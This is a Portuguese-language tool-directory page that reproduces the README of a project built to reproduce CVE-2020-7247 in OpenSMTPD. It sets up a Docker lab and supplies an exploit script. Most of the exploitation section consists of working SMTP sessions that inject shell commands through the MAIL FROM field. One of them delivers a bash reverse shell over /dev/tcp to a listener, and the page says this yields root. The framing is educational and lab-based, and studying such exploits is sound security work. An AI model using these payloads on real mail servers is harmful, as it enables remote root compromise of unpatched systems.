Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-7247-reproducer — Ambiente baseado em Docker para reproduzir o CVE-2020-7247 (OpenSMTPD) com um script de exploit em Python para execução arbitrária de comandos e reverse shell através de um campo MAIL FROM do SMTP manipulado. | Kitploit
Ferramentas/GitHubGitHub/minhluannguyen/cve-2020-7247-reproducer
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubminhluannguyen/cve-2020-7247-reproducer

CVE-2020-7247-reproducer

Ambiente baseado em Docker para reproduzir o CVE-2020-7247 (OpenSMTPD) com um script de exploit em Python para execução arbitrária de comandos e reverse shell através de um campo MAIL FROM do SMTP manipulado.

Ver Repositório
13há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-7247 (OpenSMTPD)

Informação

Este repositório contém os arquivos necessários para construir uma imagem Docker que contém um ambiente vulnerável do OpenSMTPD (6.6.1p1). A vulnerabilidade permite que um atacante execute comandos arbitrários através de uma sessão SMTP especialmente criada, especificamente no campo MAIL FROM.

Uso

  1. Construir a imagem Docker (baseada em Debian):
root@kitploit:~
docker build -t opensmtpd-vuln -f Dockerfile .
docker run -it --rm --name opensmtpd-vuln-test opensmtpd-vuln /bin/bash
smtpd -dv
  1. Construir a imagem Nix:
root@kitploit:~
nix-build opensmtpd-vuln.nix
docker load < result
docker run -it --rm opensmtpd-vuln-nix /bin/bash
smtpd -dv

Exploração

  1. Explorar a vulnerabilidade:

3.1. Executar comandos arbitrários:

root@kitploit:~
$nc 172.17.0.2 25
220 debian ESMTP OpenSMTPD
HELO toto  
250 debian Hello toto [172.17.0.1], pleased to meet you
MAIL FROM:<;touch secret.txt;>
250 2.0.0 Ok
RCPT TO:<[email protected]>
250 2.1.5 Destination address valid: Recipient ok
data
354 Enter mail, end with "." on a line by itself

Hello Bonjour Xin chào
.
250 2.0.0 09cb8342 Message accepted for delivery
QUIT
221 2.0.0 Bye

3.2. Obter uma shell reversa:

Configurar o listener:

root@kitploit:~
nc -lnvp 8080

Execute o script exploit.py (em outro terminal):

root@kitploit:~
python3 exploit.py

Ou faça manualmente:

root@kitploit:~
$nc 172.17.0.2 25
220 debian ESMTP OpenSMTPD
HELO toto  
250 debian Hello toto [172.17.0.1], pleased to meet you
MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>
250 2.0.0 Ok
RCPT TO:<[email protected]>
250 2.1.5 Destination address valid: Recipient ok
data
354 Enter mail, end with "." on a line by itself

#0
#1
#2
#3
#4
#5
#6
#7
#8
#9
#a
#b
#c
#d
sh -c 'echo "bash -i >& /dev/tcp/172.17.0.1/8080 0>&1" | bash'
.
250 2.0.0 09cb8342 Message accepted for delivery
QUIT
221 2.0.0 Bye

Você deve ter agora uma shell como root na máquina host.

Referências

  • OpenSMTPD
  • NVD
Baixar ferramenta